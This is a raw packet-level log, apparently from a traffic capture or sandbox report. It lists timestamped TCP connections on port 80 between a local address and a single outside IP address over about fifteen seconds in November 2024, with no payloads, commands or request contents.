                                                                                                            Nov 12, 2024 00:44:21.915441990 CET5016880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.917958021 CET5017080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.921813011 CET805016837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.922066927 CET5016880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.924535036 CET805017037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:21.926089048 CET5017080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.926163912 CET5017080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:21.932578087 CET805017037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:22.277321100 CET5017080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:22.284060001 CET805017037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:22.284066916 CET805017037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:22.284085035 CET805017037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:22.500466108 CET805017037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:22.572499037 CET805017037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:22.574069977 CET5017080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:22.696933985 CET5017180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:22.703737974 CET805017137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:22.703938007 CET5017180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:22.704101086 CET5017180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:22.711309910 CET805017137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:23.057717085 CET5017180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:23.065310955 CET805017137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:23.065330982 CET805017137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:23.065346956 CET805017137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:23.274389029 CET805017137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:23.359836102 CET805017137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:23.359910965 CET5017180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:23.480067968 CET5017080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:23.482207060 CET5017180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:23.482831955 CET5017280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:23.489253044 CET805017137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:23.489296913 CET5017180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:23.489489079 CET805017237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:23.489545107 CET5017280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:23.489645004 CET5017280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:23.496707916 CET805017237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:23.838927984 CET5017280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:23.843841076 CET805017237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:23.844367981 CET805017237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:23.844379902 CET805017237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:24.056349993 CET805017237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:24.134646893 CET805017237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:24.134763002 CET5017280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:24.259530067 CET5017280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:24.259823084 CET5017380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:24.266865015 CET805017337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:24.266875982 CET805017237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:24.266953945 CET5017380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:24.266957998 CET5017280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:24.267060995 CET5017380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:24.273773909 CET805017337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:24.620193005 CET5017380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:24.627429008 CET805017337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:24.627441883 CET805017337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:24.627456903 CET805017337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:24.854094028 CET805017337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:24.931427002 CET805017337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:24.931473970 CET5017380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.059880018 CET5017380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.060564995 CET5017480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.068196058 CET805017337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:25.068226099 CET805017437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:25.068239927 CET5017380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.068290949 CET5017480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.068424940 CET5017480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.076113939 CET805017437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:25.417113066 CET5017480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.425575972 CET805017437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:25.425590038 CET805017437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:25.425599098 CET805017437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:25.657527924 CET805017437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:25.732888937 CET805017437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:25.732981920 CET5017480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.851938009 CET5013180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.852021933 CET5013980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.853020906 CET5017480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.853533983 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.860863924 CET805017437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:25.860946894 CET5017480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.861253023 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:25.861324072 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.861418009 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:25.868506908 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.214083910 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.218998909 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.219007969 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.219018936 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.429392099 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.479592085 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.504298925 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.589181900 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.631853104 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.631858110 CET5017680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.636748075 CET805017637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.636879921 CET5017680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.636991024 CET5017680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.637047052 CET805017537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.637296915 CET5017580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.641706944 CET805017637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.809123993 CET5017680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.809123993 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.813971996 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.814116955 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.818001986 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.822880983 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.857229948 CET805017637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.932801008 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.937591076 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:26.937644005 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.937751055 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:26.942466974 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.167114973 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.197626114 CET805017637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.197680950 CET5017680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.199237108 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.199299097 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.292057037 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.296972990 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.296983004 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.296993971 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.381042957 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.461978912 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.462024927 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.503346920 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.580945969 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.581008911 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.699671030 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.699771881 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.700417042 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.705353022 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.705415964 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.705472946 CET805017737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.705522060 CET5017780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.705677032 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.706305027 CET805017837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:27.706342936 CET5017880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:27.710407019 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.058024883 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.062997103 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.063004971 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.063018084 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.271972895 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.353972912 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.354085922 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.476391077 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.477530956 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.481687069 CET805017937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.481797934 CET5017980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.482332945 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.482456923 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.482620001 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.487432003 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.842031956 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:28.847366095 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.847381115 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:28.847393036 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.069516897 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.151808023 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.151855946 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.276814938 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.277498007 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.282108068 CET805018037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.282155037 CET5018080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.282284021 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.282341957 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.282481909 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.287265062 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.635874033 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:29.640810013 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.640815973 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.640825987 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.848844051 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.924024105 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:29.930031061 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.039043903 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.039051056 CET5018280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.045542955 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.045809984 CET805018137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.045836926 CET5018280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.045913935 CET5018180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.046019077 CET5018280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.052755117 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.402038097 CET5018280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.409369946 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.409382105 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.409524918 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.613318920 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.693099976 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.693238020 CET5018280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.881064892 CET5018380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.881064892 CET5018280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.888994932 CET805018337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.889487982 CET805018237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:30.889591932 CET5018380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.889592886 CET5018280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.889796019 CET5018380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:30.897083998 CET805018337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:31.245294094 CET5018380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:31.250251055 CET805018337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:31.250263929 CET805018337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:31.250274897 CET805018337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:31.457740068 CET805018337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:31.533513069 CET805018337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:31.533574104 CET5018380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:31.685714960 CET5018380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:31.685977936 CET5018480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:31.692440987 CET805018337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:31.692502975 CET5018380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:31.692539930 CET805018437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:31.692624092 CET5018480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:31.692717075 CET5018480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:31.699196100 CET805018437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.042143106 CET5018480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:32.048677921 CET805018437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.048691988 CET805018437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.048700094 CET805018437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.277483940 CET805018437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.354737043 CET805018437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.356432915 CET5018480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:32.465404034 CET5018480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:32.465542078 CET5018580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:32.471844912 CET805018437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.472028017 CET805018537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.472075939 CET5018480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:32.472109079 CET5018580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:32.472213984 CET5018580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:32.477296114 CET5018580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:32.478718996 CET805018537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.479418993 CET5018680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:32.484138966 CET805018637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.484467030 CET5018680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:32.484544992 CET5018680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:32.489300013 CET805018637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.525274038 CET805018537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.839052916 CET5018680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:32.844021082 CET805018637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.844036102 CET805018637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.844048023 CET805018637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.889983892 CET805018537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:32.890038967 CET5018580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:33.050636053 CET805018637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:33.130867958 CET805018637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:33.130920887 CET5018680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:33.255845070 CET5018680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:33.256696939 CET5018780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:33.261096954 CET805018637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:33.261157036 CET5018680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:33.261471987 CET805018737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:33.261532068 CET5018780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:33.261636019 CET5018780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:33.266369104 CET805018737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:33.620316029 CET5018780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:33.626715899 CET805018737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:33.626728058 CET805018737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:33.626743078 CET805018737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:33.826948881 CET805018737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:33.903757095 CET805018737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:33.903810024 CET5018780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:34.026700020 CET5018880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:34.033198118 CET805018837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:34.033268929 CET5018880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:34.033437967 CET5018880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:34.039834023 CET805018837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:34.385935068 CET5018880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:34.392576933 CET805018837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:34.392589092 CET805018837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:34.392597914 CET805018837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:34.618331909 CET805018837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:34.699624062 CET805018837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:34.699677944 CET5018880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:34.822365046 CET5018880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:34.822973967 CET5018980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:34.829221010 CET805018837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:34.829267979 CET5018880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:34.829370975 CET805018937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:34.829435110 CET5018980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:34.829560041 CET5018980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:34.836074114 CET805018937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:35.185556889 CET5018980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:35.192023039 CET805018937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:35.192035913 CET805018937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:35.192047119 CET805018937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:35.414020061 CET805018937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:35.493902922 CET805018937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:35.494141102 CET5018980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:35.617239952 CET5018980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:35.617259026 CET5019080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:35.622211933 CET805019037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:35.622735023 CET805018937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:35.622817993 CET5018980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:35.622819901 CET5019080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:35.622934103 CET5019080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:35.627770901 CET805019037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:35.979679108 CET5019080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:35.984693050 CET805019037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:35.984705925 CET805019037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:35.984714985 CET805019037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:36.189311981 CET805019037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:36.260862112 CET5019080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:36.269113064 CET805019037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:36.382405996 CET5019080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:36.387362957 CET5019080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:36.388046980 CET5019180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:36.392512083 CET805019037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:36.392582893 CET5019080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:36.392822981 CET805019137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:36.392887115 CET5019180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:36.393008947 CET5019180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:36.397759914 CET805019137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:36.745404005 CET5019180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:36.750293016 CET805019137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:36.750313044 CET805019137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:36.750358105 CET805019137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:36.960083961 CET805019137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.040293932 CET805019137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.042190075 CET5019180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.162087917 CET5018780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.165586948 CET5019180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.166207075 CET5019280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.173214912 CET805019137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.173224926 CET805019237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.173305988 CET5019180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.173392057 CET5019280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.173487902 CET5019280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.180465937 CET805019237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.481139898 CET5019280192.168.2.437.44.238.250
